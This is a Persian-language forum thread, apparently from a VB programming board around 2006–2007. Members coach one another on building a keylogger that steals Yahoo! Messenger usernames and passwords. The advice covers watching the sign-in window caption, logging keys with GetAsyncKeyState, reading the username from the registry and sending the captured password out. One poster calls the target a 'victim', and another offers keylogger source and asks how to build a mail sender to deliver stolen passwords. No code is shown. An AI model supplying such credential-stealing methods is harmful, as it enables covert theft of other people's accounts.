رو sign in اول مسنجر كه كليك شه اگه سيو پسورد زده نشده باشه آماده ميشه براي وارد كردن يوزر و پسورد. كپشنم همون sign in هست. هر وقت اين كپشنو ديدي هر كليدي فشرده شد رو ثبت كن و بريز تو يه متغير. وقتي طرف رو sign in دوم كليك كرد تا وارد مسنجر شه فوكوس ميره رو خود مسنجر و كپشن باز هم عوض ميشه.
( يه همچين چيزي ميشه Yahoo! Messenger with Voice) اون موقع ميفهمي عمل يوزر پسورد وارد كردن تمام شده. ديگه كليدي رو ثبت نكن. برو از اون مسير تو رجيستري كه گفتم يوزر رو بخون و از پسورد تفكيكش كن.

vorojax
24-04-2006, 08:28
اهان یه چیزایی گرفتم

vorojax
09-05-2006, 21:25
ببین پیمان جون اگه یارو کنسلم یزنه همون کپشن Yahoo! Messenger with Voice میاد بنابراین مثلا پس اشتباهو سند میکنه اصلا کپشن یاهو قبل اینکه بری تو sin in همون Yahoo! Messenger with Voice هستش من کلی رو این مثله فکر کردم ولی راهی نرسی به زهنم که توش امکان اشتباه نباشه ولی یه چیزی نمیتونیم هیچ رقمه بفیم طرف چه کیلیدی رو میزنه هان
البه یه راه دیگه هم هست که اگه نشد از این راه بحسشو بعد اون ادامه میدیم

Payman_62
10-05-2006, 03:51
خوب كنسل بزنه. چه مشكليه. تو از Yahoo! Messenger with Voice ميفهمي كه طرف در صفحه sign in نيست. وقتي اومد رو پنجره Yahoo! Messenger with Voice ديگه كليدي ثبت نكن.
براي ثبت كليد ها هم از GetAsyncKeyState استفاده كن.

vorojax
10-05-2006, 09:19
رست میگی ولی مثلا یارو پسشو نصفه و الکی زد بعد کنسلو پس برای طرف سند میشه

Payman_62
10-05-2006, 16:03
رست میگی ولی مثلا یارو پسشو نصفه و الکی زد بعد کنسلو پس برای طرف سند میشه
خوب بشه. ما كه ديگه نميتونيم رو مغز قرباني هم كار كنيم كه كلك نزنه. تازه هر موقع پسشو وارد كنه پسش مياد. يعني هم درستش مياد هم غلط. بعد ميتوني با يه چك كردن ساده پس درست رو گير بياري.
فكر ميكنم اگه كمي روش فكر كني بتوني روشي پيدا كني كه اگه كنسل كرد سند نكنه.

vorojax
10-05-2006, 16:26
ok باشه
دمت گرم

vorojax
15-05-2006, 07:48
راستی پیمان جون من پسشو میدونی چه جوری گرفتم
یه سرس پیدا کردم که هر چی تو یاهو منوشتی خودش مینوشت یوز پسم خودش جداجدا میکرد
(توش از فایلایه ddl یاهو استفاده شده بود)
تازه مثله اینکه باهاش میشه offنیز فرستد
اگه خاستی رفیق بگو بزارم

Payman_62
15-05-2006, 11:18
من كه نفهميدم چي گفتي. ddl چيه؟ dll رو ميگي؟
اگه سورس آماده گير اوردي استفاده نكن. سعي كن خودت بنويسي. سورس رو هم بذار ببينيم چه جورياست.

vorojax
16-05-2006, 06:40
ببین نمیدونم فایله چه جوریه مثلا من وقتی رو قسمت پس یاهو کلیک میکنم اونم خود به خود میره رو پس یاهو و وقتی میرم تو یوزر اونم خود به خود میره تو یوز یاهو!

Payman_62
16-05-2006, 19:14
بذار ببینیم.

lord_helgard
17-06-2006, 22:58
حاجی اگه این همه مطلب رو آموزش رو به صورت کامل یا Pdf کنی یا همینجا بنویسی از این همه سئوال و طولانی شدن جلوگیری میکردی هم به من کمک میکردکی که هیچی از این هایی که گفتی نفهمیدم

Payman_62
18-06-2006, 13:23
خوب Pdf هم میکردم باز نمیفهمیدی دیگه. هر جاشو نفهمیدی بپرس برات توضیح بدم.

vorojax
23-07-2006, 09:49
بذار ببینیم.
به پيمان گل :tongue:
مي بينم كه واسه خودت مدير شدي :happy:
مباركت باشه ;)
اون فايل ياهو هم من فكر مي كردم گزاشتم نگو نزاشته بودم
ولي عوضش گزاشتم تو ايران ويگ :cool:
ديدش؟

black_storm
23-07-2006, 14:04
دوست عزیز من یه برنامه مشابه نوشته ام
که روی هر کدام از پنجره ها که کلیک می کنی - عنوان اون پنجره عوض میشه -
- میتونی از توابع api استفاده کنی
- دستوراتی مثل getwindow
-get dc
- ..
متاسفانه من امکان ارسال پیوست را هنوز ندارم وگرنه برات می فرستاده
---

Payman_62
23-07-2006, 14:23
سلام.
ممنون از لطفت.
نه برنامتو تو ویج ندیدم.

black_storm
25-07-2006, 13:22
بچه ها یه چیز بگم - حال کنید
نرم افزار solarwins که خدای شبکه است با vb نوشته شده
--------
در ضمن یه نرم افزار به نام language 2000 وجود داره که میگه یه برنامه با چه زبانی نوشته شده
-------

vorojax
30-07-2006, 00:08
سلام.
ممنون از لطفت.
نه برنامتو تو ویج ندیدم.
سلام رفيق
خوبي؟
لينكشو ميزارم همين جا

Payman_62
01-01-2007, 02:21
سلام.
چی شد پس؟ چرا نذاشتی وروجک؟

black_storm
18-01-2007, 14:19
bebin karhaye khafan khafan mikoni
man ye baname daram ye yahoo 8 ra crack karde ba source ke
mitooni chand ta yahoo baz koni
-------------------------------------------
hesb biad dastet

Payman_62
18-01-2007, 19:31
سلام.
این که چیزه جدیدی نیست. هر موقع ورژن جدید یاهو میاد پچش هم میاد که هم زمان چند تا باز کنی. من چندین ساله که همیشه حداقل با 2 آیدی آن میشم.

vorojax
18-01-2007, 20:59
سلام.
چی شد پس؟ چرا نذاشتی وروجک؟

پیمان جان به خدا بخاطر کنکور سیستممو جمع کردم و فقط درس می خونم و گر نه می زاشم
اقا جمعا شرمنده.

mahmoodriazi
19-01-2007, 16:38
جوووون بچتون...
بابا اينا رو ولش...

نيم ساعت نشستم همه رو خوندم ، دريغ از اينكه يكي بگه حالا اين پسورد رو كه در آورديم، چي جوري سندش كنيم؟!:puke: :blink: :sad:

اگه سورس بره keylogger مي خواين من ميدم... بره هر برنامه اي...

فقط بگيد چيجوري با VB يه ميل سندر ميشه ساخت؟

جوون من جواب بديد...